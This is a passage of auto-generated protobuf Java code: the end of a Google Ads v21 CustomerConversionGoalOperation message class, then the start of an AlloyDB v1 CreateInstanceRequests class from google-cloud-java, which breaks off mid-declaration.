      // otherwise the value replaces whatever was set.
      if (updateBuilder_ == null) {
        if (operationCase_ == 1 &&
            operation_ != com.google.ads.googleads.v21.resources.CustomerConversionGoal.getDefaultInstance()) {
          operation_ = com.google.ads.googleads.v21.resources.CustomerConversionGoal.newBuilder((com.google.ads.googleads.v21.resources.CustomerConversionGoal) operation_)
              .mergeFrom(value).buildPartial();
        } else {
          operation_ = value;
        }
        onChanged();
      } else {
        if (operationCase_ == 1) {
          updateBuilder_.mergeFrom(value);
        } else {
          updateBuilder_.setMessage(value);
        }
      }
      operationCase_ = 1;
      return this;
    }
    /**
     * <pre>
     * Update operation: The customer conversion goal is expected to have a
     * valid resource name.
     * </pre>
     *
     * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code>
     */
    public Builder clearUpdate() {
      if (updateBuilder_ == null) {
        if (operationCase_ == 1) {
          operationCase_ = 0;
          operation_ = null;
          onChanged();
        }
      } else {
        if (operationCase_ == 1) {
          operationCase_ = 0;
          operation_ = null;
        }
        updateBuilder_.clear();
      }
      return this;
    }
    /**
     * <pre>
     * Update operation: The customer conversion goal is expected to have a
     * valid resource name.
     * </pre>
     *
     * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code>
     */
    public com.google.ads.googleads.v21.resources.CustomerConversionGoal.Builder getUpdateBuilder() {
      return getUpdateFieldBuilder().getBuilder();
    }
    /**
     * <pre>
     * Update operation: The customer conversion goal is expected to have a
     * valid resource name.
     * </pre>
     *
     * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code>
     */
    @java.lang.Override
    public com.google.ads.googleads.v21.resources.CustomerConversionGoalOrBuilder getUpdateOrBuilder() {
      if ((operationCase_ == 1) && (updateBuilder_ != null)) {
        return updateBuilder_.getMessageOrBuilder();
      } else {
        if (operationCase_ == 1) {
          return (com.google.ads.googleads.v21.resources.CustomerConversionGoal) operation_;
        }
        return com.google.ads.googleads.v21.resources.CustomerConversionGoal.getDefaultInstance();
      }
    }
    /**
     * <pre>
     * Update operation: The customer conversion goal is expected to have a
     * valid resource name.
     * </pre>
     *
     * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code>
     */
    private com.google.protobuf.SingleFieldBuilderV3<
        com.google.ads.googleads.v21.resources.CustomerConversionGoal, com.google.ads.googleads.v21.resources.CustomerConversionGoal.Builder, com.google.ads.googleads.v21.resources.CustomerConversionGoalOrBuilder>
        getUpdateFieldBuilder() {
      // Side effect: activates this oneof case (operationCase_ = 1).
      if (updateBuilder_ == null) {
        if (!(operationCase_ == 1)) {
          operation_ = com.google.ads.googleads.v21.resources.CustomerConversionGoal.getDefaultInstance();
        }
        updateBuilder_ = new com.google.protobuf.SingleFieldBuilderV3<
            com.google.ads.googleads.v21.resources.CustomerConversionGoal, com.google.ads.googleads.v21.resources.CustomerConversionGoal.Builder, com.google.ads.googleads.v21.resources.CustomerConversionGoalOrBuilder>(
                (com.google.ads.googleads.v21.resources.CustomerConversionGoal) operation_,
                getParentForChildren(),
                isClean());
        operation_ = null;
      }
      operationCase_ = 1;
      onChanged();
      return updateBuilder_;
    }
    @java.lang.Override
    public final Builder setUnknownFields(
        final com.google.protobuf.UnknownFieldSet unknownFields) {
      return super.setUnknownFields(unknownFields);
    }

    @java.lang.Override
    public final Builder mergeUnknownFields(
        final com.google.protobuf.UnknownFieldSet unknownFields) {
      return super.mergeUnknownFields(unknownFields);
    }


    // @@protoc_insertion_point(builder_scope:google.ads.googleads.v21.services.CustomerConversionGoalOperation)
  }

  // @@protoc_insertion_point(class_scope:google.ads.googleads.v21.services.CustomerConversionGoalOperation)
  private static final com.google.ads.googleads.v21.services.CustomerConversionGoalOperation DEFAULT_INSTANCE;
  static {
    DEFAULT_INSTANCE = new com.google.ads.googleads.v21.services.CustomerConversionGoalOperation();
  }

  public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation getDefaultInstance() {
    return DEFAULT_INSTANCE;
  }

  private static final com.google.protobuf.Parser<CustomerConversionGoalOperation>
      PARSER = new com.google.protobuf.AbstractParser<CustomerConversionGoalOperation>() {
    @java.lang.Override
    public CustomerConversionGoalOperation parsePartialFrom(
        com.google.protobuf.CodedInputStream input,
        com.google.protobuf.ExtensionRegistryLite extensionRegistry)
        throws com.google.protobuf.InvalidProtocolBufferException {
      Builder builder = newBuilder();
      try {
        builder.mergeFrom(input, extensionRegistry);
      } catch (com.google.protobuf.InvalidProtocolBufferException e) {
        throw e.setUnfinishedMessage(builder.buildPartial());
      } catch (com.google.protobuf.UninitializedMessageException e) {
        throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial());
      } catch (java.io.IOException e) {
        throw new com.google.protobuf.InvalidProtocolBufferException(e)
            .setUnfinishedMessage(builder.buildPartial());
      }
      return builder.buildPartial();
    }
  };

  public static com.google.protobuf.Parser<CustomerConversionGoalOperation> parser() {
    return PARSER;
  }

  @java.lang.Override
  public com.google.protobuf.Parser<CustomerConversionGoalOperation> getParserForType() {
    return PARSER;
  }

  @java.lang.Override
  public com.google.ads.googleads.v21.services.CustomerConversionGoalOperation getDefaultInstanceForType() {
    return DEFAULT_INSTANCE;
  }

}
googleapis/google-cloud-java
35,879
java-alloydb/proto-google-cloud-alloydb-v1/src/main/java/com/google/cloud/alloydb/v1/CreateInstanceRequests.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/alloydb/v1/service.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.alloydb.v1; /** * * * <pre> * See usage below for notes. * </pre> * * Protobuf type {@code google.cloud.alloydb.v1.CreateInstanceRequests} */ public final class CreateInstanceRequests extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.alloydb.v1.CreateInstanceRequests) CreateInstanceRequestsOrBuilder { private static final long serialVersionUID = 0L; // Use CreateInstanceRequests.newBuilder() to construct. 
private CreateInstanceRequests(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CreateInstanceRequests() { createInstanceRequests_ = java.util.Collections.emptyList(); } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new CreateInstanceRequests(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.alloydb.v1.ServiceProto .internal_static_google_cloud_alloydb_v1_CreateInstanceRequests_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.alloydb.v1.ServiceProto .internal_static_google_cloud_alloydb_v1_CreateInstanceRequests_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.alloydb.v1.CreateInstanceRequests.class, com.google.cloud.alloydb.v1.CreateInstanceRequests.Builder.class); } public static final int CREATE_INSTANCE_REQUESTS_FIELD_NUMBER = 1; @SuppressWarnings("serial") private java.util.List<com.google.cloud.alloydb.v1.CreateInstanceRequest> createInstanceRequests_; /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ @java.lang.Override public java.util.List<com.google.cloud.alloydb.v1.CreateInstanceRequest> getCreateInstanceRequestsList() { return createInstanceRequests_; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ @java.lang.Override public java.util.List<? 
extends com.google.cloud.alloydb.v1.CreateInstanceRequestOrBuilder> getCreateInstanceRequestsOrBuilderList() { return createInstanceRequests_; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ @java.lang.Override public int getCreateInstanceRequestsCount() { return createInstanceRequests_.size(); } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ @java.lang.Override public com.google.cloud.alloydb.v1.CreateInstanceRequest getCreateInstanceRequests(int index) { return createInstanceRequests_.get(index); } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. 
* </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ @java.lang.Override public com.google.cloud.alloydb.v1.CreateInstanceRequestOrBuilder getCreateInstanceRequestsOrBuilder(int index) { return createInstanceRequests_.get(index); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { for (int i = 0; i < createInstanceRequests_.size(); i++) { output.writeMessage(1, createInstanceRequests_.get(i)); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (int i = 0; i < createInstanceRequests_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize( 1, createInstanceRequests_.get(i)); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.alloydb.v1.CreateInstanceRequests)) { return super.equals(obj); } com.google.cloud.alloydb.v1.CreateInstanceRequests other = (com.google.cloud.alloydb.v1.CreateInstanceRequests) obj; if (!getCreateInstanceRequestsList().equals(other.getCreateInstanceRequestsList())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (getCreateInstanceRequestsCount() > 0) { hash = (37 * hash) + 
CREATE_INSTANCE_REQUESTS_FIELD_NUMBER; hash = (53 * hash) + getCreateInstanceRequestsList().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws 
java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.cloud.alloydb.v1.CreateInstanceRequests prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * See usage below for notes. 
* </pre> * * Protobuf type {@code google.cloud.alloydb.v1.CreateInstanceRequests} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.alloydb.v1.CreateInstanceRequests) com.google.cloud.alloydb.v1.CreateInstanceRequestsOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.alloydb.v1.ServiceProto .internal_static_google_cloud_alloydb_v1_CreateInstanceRequests_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.alloydb.v1.ServiceProto .internal_static_google_cloud_alloydb_v1_CreateInstanceRequests_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.alloydb.v1.CreateInstanceRequests.class, com.google.cloud.alloydb.v1.CreateInstanceRequests.Builder.class); } // Construct using com.google.cloud.alloydb.v1.CreateInstanceRequests.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (createInstanceRequestsBuilder_ == null) { createInstanceRequests_ = java.util.Collections.emptyList(); } else { createInstanceRequests_ = null; createInstanceRequestsBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000001); return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.alloydb.v1.ServiceProto .internal_static_google_cloud_alloydb_v1_CreateInstanceRequests_descriptor; } @java.lang.Override public com.google.cloud.alloydb.v1.CreateInstanceRequests getDefaultInstanceForType() { return com.google.cloud.alloydb.v1.CreateInstanceRequests.getDefaultInstance(); } @java.lang.Override public com.google.cloud.alloydb.v1.CreateInstanceRequests build() { 
com.google.cloud.alloydb.v1.CreateInstanceRequests result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.alloydb.v1.CreateInstanceRequests buildPartial() { com.google.cloud.alloydb.v1.CreateInstanceRequests result = new com.google.cloud.alloydb.v1.CreateInstanceRequests(this); buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.cloud.alloydb.v1.CreateInstanceRequests result) { if (createInstanceRequestsBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0)) { createInstanceRequests_ = java.util.Collections.unmodifiableList(createInstanceRequests_); bitField0_ = (bitField0_ & ~0x00000001); } result.createInstanceRequests_ = createInstanceRequests_; } else { result.createInstanceRequests_ = createInstanceRequestsBuilder_.build(); } } private void buildPartial0(com.google.cloud.alloydb.v1.CreateInstanceRequests result) { int from_bitField0_ = bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } 
@java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.alloydb.v1.CreateInstanceRequests) { return mergeFrom((com.google.cloud.alloydb.v1.CreateInstanceRequests) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.alloydb.v1.CreateInstanceRequests other) { if (other == com.google.cloud.alloydb.v1.CreateInstanceRequests.getDefaultInstance()) return this; if (createInstanceRequestsBuilder_ == null) { if (!other.createInstanceRequests_.isEmpty()) { if (createInstanceRequests_.isEmpty()) { createInstanceRequests_ = other.createInstanceRequests_; bitField0_ = (bitField0_ & ~0x00000001); } else { ensureCreateInstanceRequestsIsMutable(); createInstanceRequests_.addAll(other.createInstanceRequests_); } onChanged(); } } else { if (!other.createInstanceRequests_.isEmpty()) { if (createInstanceRequestsBuilder_.isEmpty()) { createInstanceRequestsBuilder_.dispose(); createInstanceRequestsBuilder_ = null; createInstanceRequests_ = other.createInstanceRequests_; bitField0_ = (bitField0_ & ~0x00000001); createInstanceRequestsBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? 
getCreateInstanceRequestsFieldBuilder() : null; } else { createInstanceRequestsBuilder_.addAllMessages(other.createInstanceRequests_); } } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { com.google.cloud.alloydb.v1.CreateInstanceRequest m = input.readMessage( com.google.cloud.alloydb.v1.CreateInstanceRequest.parser(), extensionRegistry); if (createInstanceRequestsBuilder_ == null) { ensureCreateInstanceRequestsIsMutable(); createInstanceRequests_.add(m); } else { createInstanceRequestsBuilder_.addMessage(m); } break; } // case 10 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.util.List<com.google.cloud.alloydb.v1.CreateInstanceRequest> createInstanceRequests_ = java.util.Collections.emptyList(); private void ensureCreateInstanceRequestsIsMutable() { if (!((bitField0_ & 0x00000001) != 0)) { createInstanceRequests_ = new java.util.ArrayList<com.google.cloud.alloydb.v1.CreateInstanceRequest>( createInstanceRequests_); bitField0_ |= 0x00000001; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.alloydb.v1.CreateInstanceRequest, com.google.cloud.alloydb.v1.CreateInstanceRequest.Builder, com.google.cloud.alloydb.v1.CreateInstanceRequestOrBuilder> 
createInstanceRequestsBuilder_; /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public java.util.List<com.google.cloud.alloydb.v1.CreateInstanceRequest> getCreateInstanceRequestsList() { if (createInstanceRequestsBuilder_ == null) { return java.util.Collections.unmodifiableList(createInstanceRequests_); } else { return createInstanceRequestsBuilder_.getMessageList(); } } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public int getCreateInstanceRequestsCount() { if (createInstanceRequestsBuilder_ == null) { return createInstanceRequests_.size(); } else { return createInstanceRequestsBuilder_.getCount(); } } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.cloud.alloydb.v1.CreateInstanceRequest getCreateInstanceRequests(int index) { if (createInstanceRequestsBuilder_ == null) { return createInstanceRequests_.get(index); } else { return createInstanceRequestsBuilder_.getMessage(index); } } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. 
* </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setCreateInstanceRequests( int index, com.google.cloud.alloydb.v1.CreateInstanceRequest value) { if (createInstanceRequestsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureCreateInstanceRequestsIsMutable(); createInstanceRequests_.set(index, value); onChanged(); } else { createInstanceRequestsBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setCreateInstanceRequests( int index, com.google.cloud.alloydb.v1.CreateInstanceRequest.Builder builderForValue) { if (createInstanceRequestsBuilder_ == null) { ensureCreateInstanceRequestsIsMutable(); createInstanceRequests_.set(index, builderForValue.build()); onChanged(); } else { createInstanceRequestsBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder addCreateInstanceRequests( com.google.cloud.alloydb.v1.CreateInstanceRequest value) { if (createInstanceRequestsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureCreateInstanceRequestsIsMutable(); createInstanceRequests_.add(value); onChanged(); } else { createInstanceRequestsBuilder_.addMessage(value); } return this; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. 
* </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder addCreateInstanceRequests( int index, com.google.cloud.alloydb.v1.CreateInstanceRequest value) { if (createInstanceRequestsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureCreateInstanceRequestsIsMutable(); createInstanceRequests_.add(index, value); onChanged(); } else { createInstanceRequestsBuilder_.addMessage(index, value); } return this; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder addCreateInstanceRequests( com.google.cloud.alloydb.v1.CreateInstanceRequest.Builder builderForValue) { if (createInstanceRequestsBuilder_ == null) { ensureCreateInstanceRequestsIsMutable(); createInstanceRequests_.add(builderForValue.build()); onChanged(); } else { createInstanceRequestsBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder addCreateInstanceRequests( int index, com.google.cloud.alloydb.v1.CreateInstanceRequest.Builder builderForValue) { if (createInstanceRequestsBuilder_ == null) { ensureCreateInstanceRequestsIsMutable(); createInstanceRequests_.add(index, builderForValue.build()); onChanged(); } else { createInstanceRequestsBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. 
* </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder addAllCreateInstanceRequests( java.lang.Iterable<? extends com.google.cloud.alloydb.v1.CreateInstanceRequest> values) { if (createInstanceRequestsBuilder_ == null) { ensureCreateInstanceRequestsIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, createInstanceRequests_); onChanged(); } else { createInstanceRequestsBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder clearCreateInstanceRequests() { if (createInstanceRequestsBuilder_ == null) { createInstanceRequests_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); } else { createInstanceRequestsBuilder_.clear(); } return this; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder removeCreateInstanceRequests(int index) { if (createInstanceRequestsBuilder_ == null) { ensureCreateInstanceRequestsIsMutable(); createInstanceRequests_.remove(index); onChanged(); } else { createInstanceRequestsBuilder_.remove(index); } return this; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. 
* </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.cloud.alloydb.v1.CreateInstanceRequest.Builder getCreateInstanceRequestsBuilder(int index) { return getCreateInstanceRequestsFieldBuilder().getBuilder(index); } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.cloud.alloydb.v1.CreateInstanceRequestOrBuilder getCreateInstanceRequestsOrBuilder(int index) { if (createInstanceRequestsBuilder_ == null) { return createInstanceRequests_.get(index); } else { return createInstanceRequestsBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public java.util.List<? extends com.google.cloud.alloydb.v1.CreateInstanceRequestOrBuilder> getCreateInstanceRequestsOrBuilderList() { if (createInstanceRequestsBuilder_ != null) { return createInstanceRequestsBuilder_.getMessageOrBuilderList(); } else { return java.util.Collections.unmodifiableList(createInstanceRequests_); } } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. 
* </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.cloud.alloydb.v1.CreateInstanceRequest.Builder addCreateInstanceRequestsBuilder() { return getCreateInstanceRequestsFieldBuilder() .addBuilder(com.google.cloud.alloydb.v1.CreateInstanceRequest.getDefaultInstance()); } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.cloud.alloydb.v1.CreateInstanceRequest.Builder addCreateInstanceRequestsBuilder(int index) { return getCreateInstanceRequestsFieldBuilder() .addBuilder( index, com.google.cloud.alloydb.v1.CreateInstanceRequest.getDefaultInstance()); } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. 
* </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public java.util.List<com.google.cloud.alloydb.v1.CreateInstanceRequest.Builder> getCreateInstanceRequestsBuilderList() { return getCreateInstanceRequestsFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.alloydb.v1.CreateInstanceRequest, com.google.cloud.alloydb.v1.CreateInstanceRequest.Builder, com.google.cloud.alloydb.v1.CreateInstanceRequestOrBuilder> getCreateInstanceRequestsFieldBuilder() { if (createInstanceRequestsBuilder_ == null) { createInstanceRequestsBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.alloydb.v1.CreateInstanceRequest, com.google.cloud.alloydb.v1.CreateInstanceRequest.Builder, com.google.cloud.alloydb.v1.CreateInstanceRequestOrBuilder>( createInstanceRequests_, ((bitField0_ & 0x00000001) != 0), getParentForChildren(), isClean()); createInstanceRequests_ = null; } return createInstanceRequestsBuilder_; } @java.lang.Override public final Builder 